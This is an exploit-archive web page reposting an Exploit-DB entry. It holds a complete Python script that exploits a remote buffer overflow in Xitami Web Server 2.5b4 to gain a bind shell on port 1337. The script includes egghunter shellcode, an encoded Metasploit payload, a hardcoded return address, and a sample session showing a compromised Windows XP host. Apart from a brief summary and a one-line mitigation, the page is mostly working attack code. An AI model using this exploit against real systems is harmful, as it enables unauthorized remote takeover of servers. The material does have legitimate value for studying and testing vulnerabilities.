Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Xitami Web Server 2.5 Remote Buffer Overflow (Egghunter) - exploit.company
header-logo
Suggest Exploit
vendor:
Xitami Web Server
by:
Glafkos Charalambous
7.5
CVSS
HIGH
Remote Buffer Overflow
119
CWE
Product Name: Xitami Web Server
Affected Version From: 2.5b4
Affected Version To: 2.5b4
Patch Exists: NO
Related CWE:
CPE: a:xitami_web_server:xitami_web_server:2.5b4
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP3 En
2011

Xitami Web Server 2.5 Remote Buffer Overflow (Egghunter)

This exploit targets Xitami Web Server 2.5 and utilizes a remote buffer overflow vulnerability. The exploit sends a payload to the target server and checks for a shell on port 1337. Once the shell is established, the attacker gains control of the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to update Xitami Web Server to the latest version.
Source

Exploit-DB raw data:

# Exploit Title: Xitami Web Server 2.5 Remote Buffer Overflow (Egghunter)
# Date: June 4, 2011
# Author: Glafkos Charalambous
# Version: 2.5b4
# Tested on: Windows XP SP3 En
# Discovered by: Krystian Kloskowski
#
# root@bt:~/Desktop# python xitami.py 192.168.0.24 80
# [+] Connected
# [+] Sending payload...
# [+] Check Port 1337 for your shell
# root@bt:~/Desktop# telnet 192.168.0.24 1337
# Trying 192.168.0.24...
# Connected to 192.168.0.24.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Xitami>ipconfig
# ipconfig
#
# Windows IP Configuration
#
#
# Ethernet adapter Local Area Connection:
#
#        Connection-specific DNS Suffix  . : 
#        IP Address. . . . . . . . . . . . : 192.168.0.24
#        Subnet Mask . . . . . . . . . . . : 255.255.255.0
#        Default Gateway . . . . . . . . . : 192.168.0.1
#
# C:\Xitami>

import time
import socket
import sys

if len(sys.argv) != 3:
    print "Usage: ./xitami.py <Target IP> <Target Port>"
    sys.exit(1)

target = sys.argv[1]
port = int(sys.argv[2])

egghunt = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02"
"\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"w00t" # 4 byte tag
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

# ./msfpayload windows/shell_bind_tcp lport=1337 exitfunc=process R | ./msfencode -b '\x00\x0a\x0d' -e x86/shikata_ga_nai -c 7 -t c
shellcode = ("\xba\xa2\xcf\xad\x8d\xdb\xd1\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
"\x7e\x83\xee\xfc\x31\x56\x11\x03\x56\x11\xe2\x57\x70\xe4\x08"
"\x09\x2d\x2e\xd1\xec\x46\xf5\x22\x56\x96\x3c\x7b\x1e\x5b\x7e"
"\x78\xef\x23\x71\x82\x3e\x5f\xf1\xd3\x58\x3b\x53\x30\xe6\xbc"
"\x82\xb3\xba\xf5\xdf\x9e\x21\x78\xcd\x8d\x25\x87\x5b\xd4\xfd"
"\x6c\xcd\xcf\x7b\x68\x84\x3d\x07\xcb\x1e\x1b\x06\x11\x31\xfd"
"\x90\x27\xff\xe6\x22\x4d\xdd\x1a\xc9\xe1\x93\x45\x4b\x13\x48"
"\x74\xcc\x45\x07\x95\xd1\x38\xde\xa3\xef\x7d\x68\xb0\xd1\x67"
"\x60\xe5\x89\xb5\xf7\x3e\x2f\x49\xd7\xb8\xc0\xc6\x1b\xfc\xe2"
"\xbb\xc8\xae\x39\x78\x81\x4d\xc4\x1c\x2d\x16\x6d\xc3\x04\xde"
"\x58\x43\x4e\xc5\x60\x46\x4b\xc9\x79\xfb\x32\xdd\x46\xb8\xd4"
"\x61\x62\x92\xf6\xe8\x7b\xe8\x41\xc0\xee\xe2\xbb\x64\x6c\xb8"
"\x43\x2d\xfd\xda\x61\xb0\x7c\xe6\x36\xab\x3e\x7a\x80\xe6\x60"
"\x2b\x52\x1d\x53\xed\xb4\x94\x86\x8b\x66\x26\x56\x67\xe0\x7c"
"\xfb\x1c\xb9\x4f\x75\x4e\x7d\x63\xac\xbc\x7e\x90\xfd\xa1\xb2"
"\x6b\x06\xb4\x92\x1f\x90\x26\x1a\x4f\x3d\x18\xa2\x3c\x72\x0f"
"\x93\x37\xf7\xf3\x5a\x7f\x33\xbf\x9f\xc2\xea\xb9\x13\x6c\x77"
"\xb6\xd4\xc0\x37\x86\x78\xd3\x86\x8c\x9f\x3a\x0f\xb1\x5e\x0f"
"\xb9\x09\xf1\x0c\xe9\x2f\xb7\xd7\xea\x37\x4f\x6a\xc3\xdb\x7b"
"\x48\x32\x05\xd4\x48\xcc\x47\x59\x41\xc5\x0b\xf5\x02\xeb\x06"
"\x7f\xae\x25\x2b\x16\x2d\x51\x18\x91\x9c\x96\x32\x17\x1c\x6e"
"\x95\xb9\x4e\xf5\xa6\x29\x8b\x30\x48\x07\x55\xf1\xe4\xa8\xe2"
"\x4d\xe0\x6a\xef\xd3\x4e\x07\x4d\xb2\x25\xe0\xb2\x33\x1b\xdc"
"\x50\xac\x59\x35\xd9\x91\x9c\x44\x5a\xc1\x52\x19\x0f\x03\xc9"
"\x1d\x71\xe5\x79\x54\x3d\xc0\x87\x4d\x9f\x9d\x69\x09\xd4\x6b"
"\xe2\xa5\xe0\x77\xd0\xb9\xbd\x85\xd0\x35\xcb\x59\x78\x22\xf2"
"\x25\x78\x64\xf6\x2a\x8d\x3e\xc8\xce\x7c\x6f\x64\x24\xb4\x2c"
"\x14\xd5\xff\x9c\x84\x40\xf1\x74\xcf\x3c\x4f\xac\x2c\xe2\xae"
"\xaa\xaf\xb0\xcf\xc8\x31\x30\xb3\xb0\x8b\x08\x25\x2d\x95\x3d"
"\xf5\x0c\x1f\x23\xd9\x87\x31\x79\xd2\x8d\xad\x59\xdd\xb0\x4c"
"\xa4\x17\xeb\x97\xb0\x90\x3c\x45\xb7\x3f\x2b\x04\xf3\xc6\xe8"
"\x56\x25\x7a\xfd\x6e\x3b\xef\x64\x14\x9b\x67\x08\x9c\x47\x73"
"\x24\x1e\x1e\xc6\xd2\xad\xcc\x0c\xc8\xbb\x4e\x12\xde\xf5\x35"
"\x25\xe0\xb0\xef\x04\xb5\x29\x62\xc6\x56\x44\x52\x16\xa3\x63"
"\x63\xcd\xd1\xc9\x45\x87\x3b\xd6\x4b\x7a\x24\xd5\xd4\x7d\x4c"
"\x83\x06\x16\x88\x7f")

jump = "\xeb\x22" # short jump

buf = "A" * 72                  
buf += "\xD7\x30\x9D\x7C" # jmp esp (user32.dll) / XP SP3 English
buf += jump
buf += "\x90" * 50
buf += egghunt
buf += "w00tw00t" # tag
buf += shellcode

header = (
'GET / HTTP/1.1\r\n'
'Host: %s\r\n'
'If-Modified-Since: pwned, %s\r\n'
'\r\n') % (target, buf)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((target, port))
    print "[+] Connected"
except:
    print "[!] Connection Failed"
    sys.exit(0)

print "[+] Sending payload..."
s.send(header)
time.sleep(1)
s.close()

print "[+] Check port 1337 for your shell"

Navigation

Suggest Exploit

Services By CQR